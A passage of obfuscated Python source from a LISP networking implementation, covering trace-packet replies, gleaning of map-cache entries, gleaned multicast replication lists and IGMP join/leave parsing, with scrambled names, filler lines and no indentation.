if ( len ( O0oOo0O0O . packet_json ) == 1 and i1ii1i1Ii11 [ "node" ] == "ETR" and
O0oOo0O0O . myeid ( packet . inner_dest ) ) :
II1i1I1IIiII1 = { }
II1i1I1IIiII1 [ "seid" ] = Ooii1
II1i1I1IIiII1 [ "deid" ] = i1I1I
II1i1I1IIiII1 [ "paths" ] = [ ]
O0oOo0O0O . packet_json . append ( II1i1I1IIiII1 )
o0OOo = True
if 40 - 40: Ii1I + O0 . i11iIiiIii % I11i / Oo0Ooo
if 25 - 25: IiII * IiII
if 54 - 54: I1Ii111
if 90 - 90: Oo0Ooo / Ii1I
if 66 - 66: i11iIiiIii - I11i + oO0o . OoooooooOO
if 77 - 77: OoO0O00 / OOooOOo
O0oOo0O0O . print_trace ( )
OOO0OOo = O0oOo0O0O . encode ( )
if 97 - 97: OoOoOO00 / Ii1I * I1IiiI - Oo0Ooo % O0
if 66 - 66: O0 + I1IiiI % iIii1I11I1II1 . i1IIi % II111iiii - i1IIi
if 93 - 93: O0 + OoooooooOO % IiII % oO0o % I1ii11iIi11i
if 36 - 36: I1IiiI - oO0o * Oo0Ooo + oO0o % iII111i - i11iIiiIii
if 93 - 93: O0
if 11 - 11: OoooooooOO . I1ii11iIi11i + I1ii11iIi11i
if 73 - 73: OoooooooOO
if 2 - 2: o0oOOo0O0Ooo % IiII + I1ii11iIi11i - i11iIiiIii
ooO0O0 = O0oOo0O0O . packet_json [ 0 ] [ "paths" ] [ 0 ] [ "srloc" ]
if ( iIiiIiI111 == "?" ) :
lprint ( "LISP-Trace return to sender RLOC {}" . format ( ooO0O0 ) )
O0oOo0O0O . return_to_sender ( lisp_socket , ooO0O0 , OOO0OOo )
return ( False )
if 56 - 56: I1ii11iIi11i
if 76 - 76: Oo0Ooo / OoO0O00 - OoooooooOO
if 15 - 15: OOooOOo - I1ii11iIi11i . OoooooooOO * I1Ii111 + iII111i
if 77 - 77: O0 * Ii1I - I11i / O0 . I11i
if 55 - 55: i1IIi - i1IIi * iIii1I11I1II1 / II111iiii + iII111i / Ii1I
if 11 - 11: Oo0Ooo % OOooOOo . ooOoO0o
O0OOOOo0 = O0oOo0O0O . packet_length ( )
if 24 - 24: IiII / Oo0Ooo
if 90 - 90: ooOoO0o . OOooOOo - Ii1I
if 60 - 60: i11iIiiIii % iII111i . I1IiiI * I1ii11iIi11i
if 30 - 30: Ii1I + i11iIiiIii . I11i + o0oOOo0O0Ooo - OoO0O00
if 55 - 55: ooOoO0o - II111iiii . ooOoO0o . iII111i / OoooooooOO
if 51 - 51: I1IiiI * I1Ii111 - ooOoO0o + IiII
iII11Ii111 = packet . packet [ 0 : OoO00oo00 ]
oo00ooOOOo0O = struct . pack ( "HH" , socket . htons ( O0OOOOo0 ) , 0 )
iII11Ii111 = iII11Ii111 [ 0 : OoO00oo00 - 4 ] + oo00ooOOOo0O
if ( packet . inner_version == 6 and i1ii1i1Ii11 [ "node" ] == "ETR" and
len ( O0oOo0O0O . packet_json ) == 2 ) :
o0oOo00 = iII11Ii111 [ OoO00oo00 - 8 : : ] + OOO0OOo
o0oOo00 = lisp_udp_checksum ( i1I1I , Ooii1 , o0oOo00 )
iII11Ii111 = iII11Ii111 [ 0 : OoO00oo00 - 8 ] + o0oOo00 [ 0 : 8 ]
if 62 - 62: Ii1I / Oo0Ooo / I1ii11iIi11i . OoOoOO00 % ooOoO0o * IiII
if 97 - 97: ooOoO0o
if 14 - 14: iII111i + iII111i
if 62 - 62: ooOoO0o / OOooOOo * I1ii11iIi11i + Oo0Ooo - OoooooooOO - OoooooooOO
if 19 - 19: Ii1I . oO0o
if 26 - 26: OOooOOo + II111iiii
if ( o0OOo ) :
if ( packet . inner_version == 4 ) :
iII11Ii111 = iII11Ii111 [ 0 : 12 ] + iII11Ii111 [ 16 : 20 ] + iII11Ii111 [ 12 : 16 ] + iII11Ii111 [ 22 : 24 ] + iII11Ii111 [ 20 : 22 ] + iII11Ii111 [ 24 : : ]
if 67 - 67: IiII + OoOoOO00 * I1ii11iIi11i % o0oOOo0O0Ooo / oO0o
else :
iII11Ii111 = iII11Ii111 [ 0 : 8 ] + iII11Ii111 [ 24 : 40 ] + iII11Ii111 [ 8 : 24 ] + iII11Ii111 [ 42 : 44 ] + iII11Ii111 [ 40 : 42 ] + iII11Ii111 [ 44 : : ]
if 31 - 31: ooOoO0o / Ii1I . Ii1I - I1IiiI - Oo0Ooo . II111iiii
if 82 - 82: Oo0Ooo % Oo0Ooo
OooOOOoOoo0O0 = packet . inner_dest
packet . inner_dest = packet . inner_source
packet . inner_source = OooOOOoOoo0O0
if 17 - 17: OOooOOo % Oo0Ooo . I1IiiI * O0 * oO0o % OoOoOO00
if 99 - 99: Oo0Ooo - ooOoO0o . OoO0O00 - Oo0Ooo / O0
if 42 - 42: Ii1I - OoOoOO00 . OoOoOO00
if 88 - 88: o0oOOo0O0Ooo . Ii1I . iII111i * iII111i + i11iIiiIii
if 68 - 68: OoooooooOO
OoO00oo00 = 2 if packet . inner_version == 4 else 4
IIi1111 = 20 + O0OOOOo0 if packet . inner_version == 4 else O0OOOOo0
oooooooOOOOO = struct . pack ( "H" , socket . htons ( IIi1111 ) )
iII11Ii111 = iII11Ii111 [ 0 : OoO00oo00 ] + oooooooOOOOO + iII11Ii111 [ OoO00oo00 + 2 : : ]
if 36 - 36: I1ii11iIi11i + I1ii11iIi11i + I11i
if 61 - 61: OoooooooOO / Oo0Ooo + II111iiii
if 93 - 93: O0 * iIii1I11I1II1 % ooOoO0o . o0oOOo0O0Ooo
if 13 - 13: iIii1I11I1II1
if ( packet . inner_version == 4 ) :
oOOoooo0o0 = struct . pack ( "H" , 0 )
iII11Ii111 = iII11Ii111 [ 0 : 10 ] + oOOoooo0o0 + iII11Ii111 [ 12 : : ]
oooooooOOOOO = lisp_ip_checksum ( iII11Ii111 [ 0 : 20 ] )
iII11Ii111 = oooooooOOOOO + iII11Ii111 [ 20 : : ]
if 48 - 48: iII111i - I1ii11iIi11i
if 44 - 44: II111iiii + Oo0Ooo % OoOoOO00
if 66 - 66: iII111i + Oo0Ooo
if 74 - 74: OOooOOo / Ii1I / OoOoOO00
if 26 - 26: o0oOOo0O0Ooo
packet . packet = iII11Ii111 + OOO0OOo
return ( True )
if 59 - 59: Oo0Ooo
if 31 - 31: oO0o * i1IIi / II111iiii / I1ii11iIi11i - OoooooooOO + I11i
if 5 - 5: OOooOOo % OoOoOO00 + O0 + O0
if 32 - 32: I1ii11iIi11i . ooOoO0o
if 15 - 15: oO0o % oO0o + iIii1I11I1II1
if 19 - 19: IiII . I11i + oO0o
if 24 - 24: OoOoOO00 . I1IiiI / Ii1I
if 42 - 42: I1Ii111 / I1ii11iIi11i
if 1 - 1: OOooOOo
if 48 - 48: I1IiiI / OoooooooOO % I11i * Oo0Ooo
def lisp_allow_gleaning ( eid , group , rloc ) :
if ( lisp_glean_mappings == [ ] ) : return ( False , False , False )
if 20 - 20: Oo0Ooo
for i1ii1i1Ii11 in lisp_glean_mappings :
if ( i1ii1i1Ii11 . has_key ( "instance-id" ) ) :
o0OoO0000o = eid . instance_id
Ii1i1ii , OOo00OoOOOOO0 = i1ii1i1Ii11 [ "instance-id" ]
if ( o0OoO0000o < Ii1i1ii or o0OoO0000o > OOo00OoOOOOO0 ) : continue
if 85 - 85: I1Ii111
if ( i1ii1i1Ii11 . has_key ( "eid-prefix" ) ) :
oOo = copy . deepcopy ( i1ii1i1Ii11 [ "eid-prefix" ] )
oOo . instance_id = eid . instance_id
if ( eid . is_more_specific ( oOo ) == False ) : continue
if 98 - 98: OoO0O00 - IiII % iIii1I11I1II1 . OoOoOO00 + i1IIi + OoooooooOO
if ( i1ii1i1Ii11 . has_key ( "group-prefix" ) ) :
if ( group == None ) : continue
i11ii = copy . deepcopy ( i1ii1i1Ii11 [ "group-prefix" ] )
i11ii . instance_id = group . instance_id
if ( group . is_more_specific ( i11ii ) == False ) : continue
if 29 - 29: I1ii11iIi11i * I1Ii111 - i1IIi * i11iIiiIii * iIii1I11I1II1 % I11i
if ( i1ii1i1Ii11 . has_key ( "rloc-prefix" ) ) :
if ( rloc != None and rloc . is_more_specific ( i1ii1i1Ii11 [ "rloc-prefix" ] )
== False ) : continue
if 73 - 73: OoO0O00 . I1IiiI / o0oOOo0O0Ooo
return ( True , i1ii1i1Ii11 [ "rloc-probe" ] , i1ii1i1Ii11 [ "igmp-query" ] )
if 12 - 12: I11i * i11iIiiIii - O0 * o0oOOo0O0Ooo - IiII + I1IiiI
return ( False , False , False )
if 7 - 7: oO0o + I1Ii111 . o0oOOo0O0Ooo / IiII + iIii1I11I1II1 % I1Ii111
if 24 - 24: i11iIiiIii + iIii1I11I1II1
if 22 - 22: i11iIiiIii . II111iiii / o0oOOo0O0Ooo / Ii1I . O0 . OoOoOO00
if 89 - 89: O0 * Oo0Ooo + I1Ii111 + ooOoO0o * OoOoOO00
if 20 - 20: OoO0O00 - OoOoOO00
if 84 - 84: iIii1I11I1II1 + ooOoO0o . o0oOOo0O0Ooo % iII111i
if 35 - 35: I11i - oO0o * oO0o / OoooooooOO + iII111i + OoOoOO00
def lisp_build_gleaned_multicast ( seid , geid , rloc , port , igmp ) :
iI1i1iIi1iiII = geid . print_address ( )
I1IIIIiIIIIiII = seid . print_address_no_iid ( )
IiII1iiI = green ( "{}" . format ( I1IIIIiIIIIiII ) , False )
oOo = green ( "(*, {})" . format ( iI1i1iIi1iiII ) , False )
O0OOOO0o0O = red ( rloc . print_address_no_iid ( ) + ":" + str ( port ) , False )
if 74 - 74: oO0o - i1IIi . Oo0Ooo / I1IiiI + o0oOOo0O0Ooo . OoOoOO00
if 35 - 35: iII111i / Ii1I
if 57 - 57: ooOoO0o . I1IiiI * OOooOOo
if 87 - 87: I11i - I11i % iII111i - Ii1I
o0o000Oo = lisp_map_cache_lookup ( seid , geid )
if ( o0o000Oo == None ) :
o0o000Oo = lisp_mapping ( "" , "" , [ ] )
o0o000Oo . group . copy_address ( geid )
o0o000Oo . eid . copy_address ( geid )
o0o000Oo . eid . address = 0
o0o000Oo . eid . mask_len = 0
o0o000Oo . mapping_source . copy_address ( rloc )
o0o000Oo . map_cache_ttl = LISP_IGMP_TTL
o0o000Oo . gleaned = True
o0o000Oo . add_cache ( )
lprint ( "Add gleaned EID {} to map-cache" . format ( oOo ) )
if 29 - 29: oO0o - ooOoO0o * iIii1I11I1II1 / OoOoOO00
if 34 - 34: I1IiiI . Oo0Ooo
if 4 - 4: Ii1I - II111iiii * iII111i / oO0o - I1IiiI
if 32 - 32: iIii1I11I1II1 - I11i
if 49 - 49: I11i * I1Ii111 - iIii1I11I1II1 * O0
if 72 - 72: I1IiiI * iII111i
i1III111 = O00O00O000OOo = Iii = None
if ( o0o000Oo . rloc_set != [ ] ) :
i1III111 = o0o000Oo . rloc_set [ 0 ]
if ( i1III111 . rle ) :
O00O00O000OOo = i1III111 . rle
for OOiIi1 in O00O00O000OOo . rle_nodes :
if ( OOiIi1 . rloc_name != I1IIIIiIIIIiII ) : continue
Iii = OOiIi1
break
if 46 - 46: OOooOOo / iII111i . i1IIi . i11iIiiIii . iIii1I11I1II1 % I11i
if 62 - 62: I11i % II111iiii % OoooooooOO * ooOoO0o / oO0o
if 29 - 29: o0oOOo0O0Ooo / O0 / OoO0O00
if 23 - 23: Ii1I + i11iIiiIii % IiII
if 64 - 64: i11iIiiIii + OoooooooOO . oO0o * Ii1I
if 49 - 49: O0
if 72 - 72: I1Ii111
if ( i1III111 == None ) :
i1III111 = lisp_rloc ( )
o0o000Oo . rloc_set = [ i1III111 ]
i1III111 . priority = 253
i1III111 . mpriority = 255
o0o000Oo . build_best_rloc_set ( )
if 96 - 96: II111iiii / OOooOOo % i1IIi / Oo0Ooo
if ( O00O00O000OOo == None ) :
O00O00O000OOo = lisp_rle ( geid . print_address ( ) )
i1III111 . rle = O00O00O000OOo
if 22 - 22: I1IiiI % iIii1I11I1II1 % I1ii11iIi11i
if ( Iii == None ) :
Iii = lisp_rle_node ( )
Iii . rloc_name = I1IIIIiIIIIiII
O00O00O000OOo . rle_nodes . append ( Iii )
O00O00O000OOo . build_forwarding_list ( )
lprint ( "Add RLE {} from {} for gleaned EID {}" . format ( O0OOOO0o0O , IiII1iiI , oOo ) )
elif ( rloc . is_exact_match ( Iii . address ) == False or
port != Iii . translated_port ) :
lprint ( "Changed RLE {} from {} for gleaned EID {}" . format ( O0OOOO0o0O , IiII1iiI , oOo ) )
if 68 - 68: iII111i + I11i
if 61 - 61: oO0o . I1Ii111
if 74 - 74: O0 . Ii1I - iII111i % IiII + II111iiii
if 71 - 71: oO0o + Ii1I % oO0o
if 17 - 17: I1Ii111 % I1Ii111 * o0oOOo0O0Ooo
Iii . store_translated_rloc ( rloc , port )
if 84 - 84: I1Ii111 + iII111i . i1IIi / O0 / I1Ii111 + o0oOOo0O0Ooo
if 70 - 70: O0 % ooOoO0o - iII111i + oO0o
if 12 - 12: I1Ii111 - OoO0O00 % II111iiii % ooOoO0o / II111iiii % OoOoOO00
if 74 - 74: iII111i . OOooOOo * Ii1I / Oo0Ooo . OoO0O00 . I11i
if 65 - 65: i11iIiiIii - OoO0O00 / OoooooooOO * I1IiiI % iII111i
if ( igmp ) :
I1IIiiiI1I1iiIii = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( I1IIiiiI1I1iiIii ) == False ) :
lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] = { }
if 15 - 15: OOooOOo * Ii1I / ooOoO0o
lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] [ iI1i1iIi1iiII ] = lisp_get_timestamp ( )
if 70 - 70: i11iIiiIii * oO0o . I11i - OoooooooOO / I1ii11iIi11i
if 10 - 10: IiII * OoOoOO00 . II111iiii . II111iiii * Oo0Ooo
if 23 - 23: I1ii11iIi11i + I11i
if 74 - 74: i1IIi % I1IiiI
if 44 - 44: Oo0Ooo - OoooooooOO % ooOoO0o + II111iiii
if 60 - 60: o0oOOo0O0Ooo - ooOoO0o + i11iIiiIii % I1ii11iIi11i % II111iiii
if 62 - 62: Ii1I
if 30 - 30: iII111i % O0 + II111iiii * I1IiiI
def lisp_remove_gleaned_multicast ( seid , geid ) :
if 91 - 91: i11iIiiIii
if 35 - 35: OoOoOO00 * I1Ii111 / Oo0Ooo - i1IIi - IiII + OOooOOo
if 96 - 96: Oo0Ooo + I1ii11iIi11i . O0
if 62 - 62: i1IIi % OoooooooOO % OoooooooOO
o0o000Oo = lisp_map_cache_lookup ( seid , geid )
if ( o0o000Oo == None ) : return
if 53 - 53: O0 * oO0o
iI1Ii11 = o0o000Oo . rloc_set [ 0 ] . rle
if ( iI1Ii11 == None ) : return
if 22 - 22: OOooOOo % Oo0Ooo % ooOoO0o - O0 + i1IIi
oo0O0OOooO0 = seid . print_address_no_iid ( )
ooOoOO0o = False
for Iii in iI1Ii11 . rle_nodes :
if ( Iii . rloc_name == oo0O0OOooO0 ) :
ooOoOO0o = True
break
if 67 - 67: OoO0O00 / I1IiiI - IiII + iII111i - iII111i
if 4 - 4: IiII . Ii1I . IiII % OoO0O00
if ( ooOoOO0o == False ) : return
if 12 - 12: OoOoOO00 + O0 / O0 . i1IIi
if 58 - 58: IiII . iII111i % O0 . Ii1I * Oo0Ooo
if 54 - 54: OoO0O00 % OOooOOo - OoO0O00 . Oo0Ooo % i1IIi
if 95 - 95: iII111i . OoooooooOO . o0oOOo0O0Ooo / II111iiii - OoooooooOO / I1Ii111
iI1Ii11 . rle_nodes . remove ( Iii )
iI1Ii11 . build_forwarding_list ( )
if 11 - 11: II111iiii / iII111i . oO0o / ooOoO0o / OOooOOo + OoO0O00
iI1i1iIi1iiII = geid . print_address ( )
I1IIiiiI1I1iiIii = seid . print_address ( )
IiII1iiI = green ( "{}" . format ( I1IIiiiI1I1iiIii ) , False )
oOo = green ( "(*, {})" . format ( iI1i1iIi1iiII ) , False )
lprint ( "Gleaned EID {} RLE removed for {}" . format ( oOo , IiII1iiI ) )
if 37 - 37: iIii1I11I1II1 * O0
if 64 - 64: I1Ii111 - II111iiii + oO0o % ooOoO0o * oO0o
if 27 - 27: iIii1I11I1II1 - Ii1I . i11iIiiIii / IiII . I1Ii111 / i11iIiiIii
if 27 - 27: OoOoOO00 . I11i / OoOoOO00
if ( lisp_gleaned_groups . has_key ( I1IIiiiI1I1iiIii ) ) :
if ( lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] . has_key ( iI1i1iIi1iiII ) ) :
lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] . pop ( iI1i1iIi1iiII )
if 96 - 96: OoO0O00 - I1IiiI
if 73 - 73: I1IiiI - o0oOOo0O0Ooo - I1Ii111
if 34 - 34: iIii1I11I1II1 - i1IIi + OoO0O00 % Oo0Ooo + i1IIi
if 46 - 46: I1IiiI
if 82 - 82: iII111i . i1IIi
if 38 - 38: Ii1I . I1IiiI . I1ii11iIi11i
if ( iI1Ii11 . rle_nodes == [ ] ) :
o0o000Oo . delete_cache ( )
lprint ( "Gleaned EID {} remove, no more RLEs" . format ( oOo ) )
if 26 - 26: O0 - II111iiii * I1Ii111 - OoOoOO00
if 96 - 96: I11i * Oo0Ooo / OOooOOo - IiII
if 75 - 75: OoooooooOO - O0
if 39 - 39: i11iIiiIii / Ii1I / ooOoO0o
if 93 - 93: o0oOOo0O0Ooo - Oo0Ooo / oO0o / OoOoOO00
if 75 - 75: o0oOOo0O0Ooo * ooOoO0o % Ii1I
if 94 - 94: OoooooooOO + II111iiii / iIii1I11I1II1 * ooOoO0o
if 85 - 85: ooOoO0o / IiII
def lisp_change_gleaned_multicast ( seid , rloc , port ) :
I1IIiiiI1I1iiIii = seid . print_address ( )
if ( lisp_gleaned_groups . has_key ( I1IIiiiI1I1iiIii ) == False ) : return
if 28 - 28: i11iIiiIii - OoOoOO00
for IIi1iiIII11 in lisp_gleaned_groups [ I1IIiiiI1I1iiIii ] :
lisp_geid . store_address ( IIi1iiIII11 )
lisp_build_gleaned_multicast ( seid , lisp_geid , rloc , port , False )
if 13 - 13: O0
if 82 - 82: OoooooooOO
if 59 - 59: I1Ii111 + I1ii11iIi11i + OoO0O00 % oO0o . i1IIi % O0
if 22 - 22: i1IIi * OoOoOO00 + Ii1I
if 48 - 48: Ii1I % IiII + OoO0O00 . IiII
if 42 - 42: Ii1I
if 70 - 70: I11i
if 82 - 82: O0
if 58 - 58: II111iiii . O0 - OoO0O00 - IiII
if 4 - 4: i11iIiiIii + i11iIiiIii / O0
if 46 - 46: I11i % ooOoO0o - Ii1I
if 25 - 25: O0 / i11iIiiIii . O0
if 24 - 24: I1ii11iIi11i - i11iIiiIii / iII111i . Oo0Ooo / I1ii11iIi11i
if 92 - 92: I11i % OoooooooOO
if 14 - 14: i11iIiiIii * i11iIiiIii * OoOoOO00
if 84 - 84: OOooOOo % I1Ii111 + I11i / I1IiiI . iII111i
if 78 - 78: oO0o . Oo0Ooo
if 18 - 18: IiII
if 35 - 35: OoooooooOO / i1IIi - OoO0O00 + Oo0Ooo - o0oOOo0O0Ooo
if 100 - 100: II111iiii % i11iIiiIii % oO0o + O0
if 46 - 46: OoO0O00 / I1IiiI - Oo0Ooo . o0oOOo0O0Ooo . Oo0Ooo % I11i
if 43 - 43: IiII - O0 + I1Ii111 % OoooooooOO % OoO0O00 / I1Ii111
if 48 - 48: I1ii11iIi11i . i1IIi % i1IIi - iII111i * o0oOOo0O0Ooo + IiII
if 45 - 45: II111iiii . II111iiii + I1IiiI / I1Ii111 . OoO0O00 - o0oOOo0O0Ooo
if 20 - 20: ooOoO0o % oO0o
if 28 - 28: i1IIi . II111iiii + O0 / O0 % OoOoOO00 + OOooOOo
if 24 - 24: OoooooooOO
if 11 - 11: i11iIiiIii / iIii1I11I1II1 % ooOoO0o + OOooOOo
if 73 - 73: OoOoOO00 + OoooooooOO + iIii1I11I1II1 + II111iiii * iIii1I11I1II1 - OoOoOO00
if 71 - 71: O0 * OOooOOo . I1IiiI . I1Ii111 * I11i
if 45 - 45: O0 . O0 . II111iiii * ooOoO0o
if 2 - 2: OoO0O00 . o0oOOo0O0Ooo
if 48 - 48: Ii1I
if 45 - 45: I1ii11iIi11i - I11i + Ii1I
if 82 - 82: iII111i
if 81 - 81: i1IIi % OOooOOo - OoO0O00 - Oo0Ooo
if 19 - 19: i1IIi
if 97 - 97: OoO0O00 + i11iIiiIii % I1IiiI * Ii1I
if 89 - 89: IiII % i11iIiiIii + OoO0O00 . oO0o / I1IiiI . Ii1I
if 11 - 11: ooOoO0o - I1Ii111 - I11i + OoOoOO00
if 20 - 20: I11i + O0
if 27 - 27: Oo0Ooo
if 12 - 12: I1ii11iIi11i . iII111i - iII111i - OOooOOo - iIii1I11I1II1
if 50 - 50: I1IiiI - iIii1I11I1II1 . iII111i - Ii1I / I1Ii111 + iII111i
if 46 - 46: OOooOOo + iII111i % Oo0Ooo * iII111i % OoooooooOO * IiII
if 27 - 27: I1IiiI + I1IiiI + I1ii11iIi11i - oO0o * OOooOOo
if 53 - 53: I1ii11iIi11i / OoooooooOO * iIii1I11I1II1
if 4 - 4: I1IiiI . iIii1I11I1II1 + OOooOOo / IiII . o0oOOo0O0Ooo . I11i
if 52 - 52: ooOoO0o % i11iIiiIii . IiII + OoO0O00
if 66 - 66: II111iiii . Ii1I
if 42 - 42: iIii1I11I1II1 * iII111i * I1IiiI
if 66 - 66: Oo0Ooo * i1IIi / I1ii11iIi11i / OoO0O00
if 12 - 12: OOooOOo + iIii1I11I1II1 % I1Ii111 + OOooOOo
if 19 - 19: OoO0O00 / I1IiiI - o0oOOo0O0Ooo - i1IIi + I1ii11iIi11i * OoooooooOO
if 74 - 74: I1Ii111 . I11i / Oo0Ooo
if 88 - 88: oO0o % OoO0O00 - i11iIiiIii % I1Ii111 / O0 * IiII
if 99 - 99: o0oOOo0O0Ooo . ooOoO0o / i11iIiiIii
if 44 - 44: IiII + OOooOOo % OoO0O00 . OoooooooOO * O0
if 72 - 72: i1IIi - iII111i * I1IiiI % O0 - I11i * O0
if 78 - 78: I1IiiI - OoO0O00 / Ii1I . i1IIi
if 30 - 30: IiII
if 21 - 21: i1IIi . iII111i - I1IiiI
if 28 - 28: IiII / Ii1I - i1IIi - OoOoOO00
if 65 - 65: o0oOOo0O0Ooo * OoO0O00 / o0oOOo0O0Ooo
if 77 - 77: OoooooooOO - Oo0Ooo - OoOoOO00 / I11i / O0 . i11iIiiIii
if 27 - 27: I1Ii111 * O0
if 9 - 9: i1IIi - Oo0Ooo - i11iIiiIii / iIii1I11I1II1 . i1IIi
if 2 - 2: I11i + II111iiii - I11i / oO0o / I11i
if 73 - 73: IiII % I1Ii111 . OoOoOO00
if 96 - 96: I1IiiI / ooOoO0o / iIii1I11I1II1
if 91 - 91: Ii1I . I11i
if 87 - 87: Oo0Ooo / IiII * OOooOOo + I1ii11iIi11i . I11i
if 56 - 56: oO0o + oO0o % o0oOOo0O0Ooo + OOooOOo . II111iiii + i11iIiiIii
if 45 - 45: iIii1I11I1II1 / o0oOOo0O0Ooo * OoooooooOO - Oo0Ooo
if 77 - 77: II111iiii
if 8 - 8: I1IiiI * II111iiii % I1ii11iIi11i
if 88 - 88: Oo0Ooo . oO0o + OoOoOO00 % OoooooooOO
if 81 - 81: OoooooooOO . I1Ii111 + OoO0O00 % I1Ii111
if 49 - 49: oO0o . oO0o % oO0o / Oo0Ooo
if 62 - 62: ooOoO0o . i1IIi % OoO0O00 - I1ii11iIi11i - IiII
if 57 - 57: i1IIi - II111iiii - O0 . iII111i + OoO0O00
if 67 - 67: OOooOOo * iII111i / iIii1I11I1II1 / I1ii11iIi11i
if 10 - 10: OoooooooOO % I1ii11iIi11i * i1IIi . iII111i
if 96 - 96: II111iiii % i11iIiiIii - Oo0Ooo
if 70 - 70: O0 * iIii1I11I1II1 - IiII * I11i / Ii1I + i11iIiiIii
if 26 - 26: II111iiii - I11i % I11i / ooOoO0o + Oo0Ooo
if 91 - 91: I1IiiI % Ii1I - OOooOOo - Oo0Ooo / I1IiiI / OoO0O00
if 40 - 40: OoooooooOO
if 71 - 71: OOooOOo
if 88 - 88: O0
if 44 - 44: II111iiii - IiII / I1IiiI + ooOoO0o % iII111i - iII111i
if 53 - 53: OoooooooOO
igmp_types = { 17 : "IGMP-query" , 18 : "IGMPv1-report" , 19 : "DVMRP" ,
20 : "PIMv1" , 22 : "IGMPv2-report" , 23 : "IGMPv2-leave" ,
30 : "mtrace-response" , 31 : "mtrace-request" , 34 : "IGMPv3-report" }
if 41 - 41: i1IIi - oO0o
lisp_igmp_record_types = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 41 - 41: I11i
def lisp_process_igmp_packet ( packet ) :
i1IIi1ii1i1ii = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
i1IIi1ii1i1ii . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
i1IIi1ii1i1ii = bold ( "from {}" . format ( i1IIi1ii1i1ii . print_address_no_iid ( ) ) , False )
if 92 - 92: i11iIiiIii
O0OOOO0o0O = bold ( "Receive" , False )
lprint ( "{} {}-byte {}, IGMP packet: {}" . format ( O0OOOO0o0O , len ( packet ) , i1IIi1ii1i1ii ,
lisp_format_packet ( packet ) ) )
if 62 - 62: i1IIi / I1IiiI - o0oOOo0O0Ooo
if 3 - 3: O0 * OoOoOO00 * I11i / OoOoOO00
if 77 - 77: i1IIi
if 3 - 3: iII111i * OoO0O00 - oO0o + iII111i . o0oOOo0O0Ooo + I1IiiI
ooO0o = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 43 - 43: O0
if 22 - 22: OoOoOO00 . O0 - I1Ii111
if 78 - 78: I1Ii111 * Ii1I % Ii1I + I1IiiI
if 83 - 83: iIii1I11I1II1 + O0 / IiII . iIii1I11I1II1
oOooo0 = packet [ ooO0o : : ]
oO0O0 = struct . unpack ( "B" , oOooo0 [ 0 ] ) [ 0 ]
if 8 - 8: IiII * ooOoO0o . o0oOOo0O0Ooo - I1Ii111
if 10 - 10: I1Ii111
if 27 - 27: iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 + oO0o / iIii1I11I1II1 - i1IIi % OoO0O00
if 22 - 22: OOooOOo
IIi1iiIII11 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IIi1iiIII11 . address = socket . ntohl ( struct . unpack ( "II" , oOooo0 [ : 8 ] ) [ 1 ] )
iI1i1iIi1iiII = IIi1iiIII11 . print_address_no_iid ( )
if 65 - 65: i1IIi - oO0o . I1Ii111 . ooOoO0o % I1ii11iIi11i % I1ii11iIi11i
if ( oO0O0 == 17 ) :
lprint ( "IGMP Query for group {}" . format ( iI1i1iIi1iiII ) )
return ( True )
if 1 - 1: I1Ii111 + I1Ii111
if 96 - 96: iII111i + OoOoOO00 - o0oOOo0O0Ooo + Ii1I
ii1IIi = ( oO0O0 in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( ii1IIi == False ) :
IIIIoO00O0ooO = "{} ({})" . format ( oO0O0 , igmp_types [ oO0O0 ] ) if igmp_types . has_key ( oO0O0 ) else oO0O0
if 13 - 13: Ii1I
lprint ( "IGMP type {} not supported" . format ( IIIIoO00O0ooO ) )
return ( [ ] )
if 50 - 50: Ii1I - OOooOOo % Ii1I / IiII % oO0o
if 61 - 61: i11iIiiIii + Ii1I + ooOoO0o % Ii1I . ooOoO0o / O0
if ( len ( oOooo0 ) < 8 ) :
lprint ( "IGMP message too small" )
return ( [ ] )
if 25 - 25: oO0o
if 47 - 47: Oo0Ooo . Oo0Ooo . I1IiiI / OoO0O00 + II111iiii + IiII
if 23 - 23: i1IIi . II111iiii
if 60 - 60: ooOoO0o * oO0o + Oo0Ooo / iIii1I11I1II1
if 74 - 74: OoooooooOO + II111iiii - IiII + O0
if ( oO0O0 == 0x17 ) :
lprint ( "IGMPv2 leave (*, {})" . format ( bold ( iI1i1iIi1iiII , False ) ) )
return ( [ [ None , iI1i1iIi1iiII , False ] ] )
if 62 - 62: O0 . I11i * oO0o
if ( oO0O0 in ( 0x12 , 0x16 ) ) :
lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( oO0O0 == 0x12 ) else 2 , bold ( iI1i1iIi1iiII , False ) ) )
if 88 - 88: iII111i * iII111i - ooOoO0o + OoO0O00 . iII111i
if 44 - 44: I11i / I1Ii111
if 77 - 77: oO0o * OoOoOO00 * O0 % IiII
if 45 - 45: OoOoOO00
if 66 - 66: I11i
if ( iI1i1iIi1iiII . find ( "224.0.0." ) != - 1 ) :
lprint ( "Suppress registration for link-local groups" )
else :
return ( [ [ None , iI1i1iIi1iiII , True ] ] )
if 10 - 10: i11iIiiIii - O0 / iII111i * i11iIiiIii * OoooooooOO - oO0o
if 70 - 70: i1IIi / IiII + II111iiii - I1ii11iIi11i . OoooooooOO - i1IIi
if 34 - 34: OoOoOO00 + iII111i - I11i . IiII
if 79 - 79: ooOoO0o - II111iiii + I1IiiI - o0oOOo0O0Ooo . Ii1I
if 16 - 16: o0oOOo0O0Ooo . i1IIi * ooOoO0o / OoOoOO00 % i11iIiiIii
return ( [ ] )
if 57 - 57: IiII
if 89 - 89: I1ii11iIi11i - I1Ii111 + o0oOOo0O0Ooo
if 62 - 62: I1ii11iIi11i + OoooooooOO * OOooOOo
if 49 - 49: i1IIi - I11i * II111iiii
if 4 - 4: o0oOOo0O0Ooo + o0oOOo0O0Ooo
ooOO0o0O0 = IIi1iiIII11 . address
oOooo0 = oOooo0 [ 8 : : ]
